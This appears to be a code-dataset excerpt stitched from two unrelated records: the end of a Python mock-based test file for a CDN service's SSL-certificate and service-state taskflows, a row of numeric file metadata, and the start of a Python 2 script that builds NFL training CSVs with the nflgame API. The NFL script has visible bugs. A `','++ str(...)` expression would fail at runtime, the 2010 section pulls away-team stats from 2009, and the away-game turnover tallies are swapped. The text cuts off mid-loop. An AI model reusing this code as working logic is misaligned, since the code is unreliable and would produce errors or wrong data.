'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_responder_returns = self.dns_exceptions_only()
dns_controller.enable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
dns_controller.disable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_create_ssl_certificate_normal(self):
providers = ['cdn_provider']
cert_obj_json = ssl_certificate.SSLCertificate('cdn',
'mytestsite.com',
'san')
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'cert_obj_json': json.dumps(cert_obj_json.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_ssl_certificate_flow(service_controller,
storage_controller,
dns_controller)
engines.run(create_ssl_certificate.create_ssl_certificate(),
store=kwargs)
def test_recreate_ssl_certificate(self):
providers = ['cdn_provider']
cert_obj_json = ssl_certificate.SSLCertificate('cdn',
'mytestsite.com',
'san')
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'domain_name': 'mytestsite.com',
'cert_type': 'san',
'cert_obj_json': json.dumps(cert_obj_json.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_recreate_ssl_certificate_flow(service_controller,
storage_controller,
dns_controller)
engines.run(recreate_ssl_certificate.recreate_ssl_certificate(),
store=kwargs)
def test_delete_ssl_certificate_normal(self):
providers = ['cdn_provider']
cert_obj = ssl_certificate.SSLCertificate(
'cdn',
'mytestsite.com',
'san',
)
kwargs = {
'cert_type': "san",
'project_id': json.dumps(str(uuid.uuid4())),
'domain_name': "mytestsite.com",
'cert_obj': json.dumps(cert_obj.to_dict()),
'providers_list': json.dumps(providers),
'flavor_id': "premium",
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_ssl_certificate_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
)
engines.run(
delete_ssl_certificate.delete_ssl_certificate(),
store=kwargs
)
def test_delete_ssl_certificate_retry(self):
"""Test the retry functionality.
Test that when ``delete_ssl_certificate()`` fails,
It is retried as per the configuration.
Check that number of times the method
``delete_ssl_certificate()`` is called is equal
to retry count as per the configuration.
"""
providers = ['cdn_provider']
cert_obj = ssl_certificate.SSLCertificate(
'cdn',
'www.domain.com',
'sni',
)
kwargs = {
'cert_type': "sni",
'project_id': "123",
'domain_name': "www.domain.com",
'cert_obj': json.dumps(cert_obj.to_dict()),
'providers_list': providers,
'flavor_id': "cdn",
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_ssl_certificate_retry_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
)
self.assertRaises(Exception,
engines.run,
delete_ssl_certificate.delete_ssl_certificate(),
store=kwargs)
# Check that the delete_certificate() has been called
# Five times(which is the retry count).
self.assertEqual(service_controller.provider_wrapper.
delete_certificate.call_count, 5)
def test_delete_ssl_cert_kwargs(self):
"""Test args for the delete_ssl_certificate flow.
Update a service with two domains in it by deleting
one domain from the service. Make sure the domains
are https. This should make the ``update_service taskflow``
to call ``delete_ssl_certificate taskflow``.
Test that the arguments passed to ``delete_ssl_certificate``
flow are correct.
Below is an example of arguments that the ``delete_ssl_certificate``
receives.
.. code-block:: python
kwargs = {
'project_id': '1234',
'cert_type': 'san',
'context_dict': {}
'flavor_id': 'cdn',
'providers_list': ['Akamai']
}
"""
service_id = str(uuid.uuid4())
# Two HTTPS domains with SNI certificates; removing one of them is
# what should trigger the delete_ssl_certificate sub-flow.
domain1 = domain.Domain(domain='cdn.poppy.org',
protocol='https',
certificate='sni')
domain2 = domain.Domain(domain='mycdn.poppy.org',
protocol='https',
certificate='sni')
domains_old = [domain1, domain2]
# The updated service keeps only domain2 -> domain1 is being deleted.
domains_new = [domain2]
current_origin = origin.Origin(origin='poppy.org')
# Old/new service snapshots as the update_service flow expects them.
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=domains_old,
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=domains_new,
origins=[current_origin],
flavor_id='cdn')
# Flow inputs for update_service; values are JSON-serialized for the
# taskflow store.
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
# Mocked controller set shared by these flow tests.
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
engines.run(update_service.update_service(), store=kwargs)
# The update flow should submit exactly one delete_ssl_certificate
# task, for the removed domain, with these keyword arguments.
service_controller.distributed_task_controller.submit_task. \
assert_called_once_with(ANY,
context_dict=ANY,
project_id=ANY,
cert_type='san',
domain_name=u'cdn.poppy.org',
flavor_id=u'cdn',
providers_list=[])
| 43.449563
| 80
| 0.54167
| 4,882
| 54,703
| 5.717329
| 0.05551
| 0.056356
| 0.084157
| 0.066996
| 0.892985
| 0.884781
| 0.868981
| 0.861529
| 0.841072
| 0.818179
| 0
| 0.002236
| 0.378626
| 54,703
| 1,258
| 81
| 43.484102
| 0.818923
| 0.032887
| 0
| 0.781576
| 0
| 0
| 0.062806
| 0.007706
| 0
| 0
| 0
| 0
| 0.002849
| 1
| 0.033238
| false
| 0.00095
| 0.020893
| 0
| 0.058879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46a1cb1e239a2094ec24af4611b96732b3af9541
| 43,901
|
py
|
Python
|
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | 4
|
2017-09-08T18:42:11.000Z
|
2020-06-01T04:01:36.000Z
|
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | null | null | null |
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | null | null | null |
"""
Use nflgame api to pull out and compile stats. Export to .csv ready to be used with Erudite
"""
from decimal import Decimal, ROUND_DOWN
import nflgame
import csv
import sys
import fileinput
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return the answer as a bool.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
    It must be "yes" (the default), "no" or None (meaning
    an answer is required of the user).

    Returns True for a "yes" answer and False for "no".
    Raises ValueError if *default* is not one of the accepted values.
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    # Fix: compare to None with 'is', not '==' (PEP 8 identity check).
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)
    # Loop until the user gives a recognizable answer (or an empty line
    # when a default is available).
    while True:
        sys.stdout.write(question + prompt)
        choice = raw_input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            sys.stdout.write("Please respond with 'yes' or 'no' "
                             "(or 'y' or 'n').\n")
print 'nflgame API loaded'
print 'Compiling training sets...'
print 'Compiling traing set for 2009 NFL season...'
season2009 = nflgame.games_gen(2009, kind="REG")
f = open('nfl2009ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2009, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Done exporting to .csv file...'
f.close()
print 'Compiling traing set for 2010 NFL season...'
season2009 = nflgame.games_gen(2010, kind="REG")
f = open('nfl2010ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2010, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'Compiling traing set for 2011 NFL season...'
season2009 = nflgame.games_gen(2011, kind="REG")
f = open('nfl2011ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2011, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
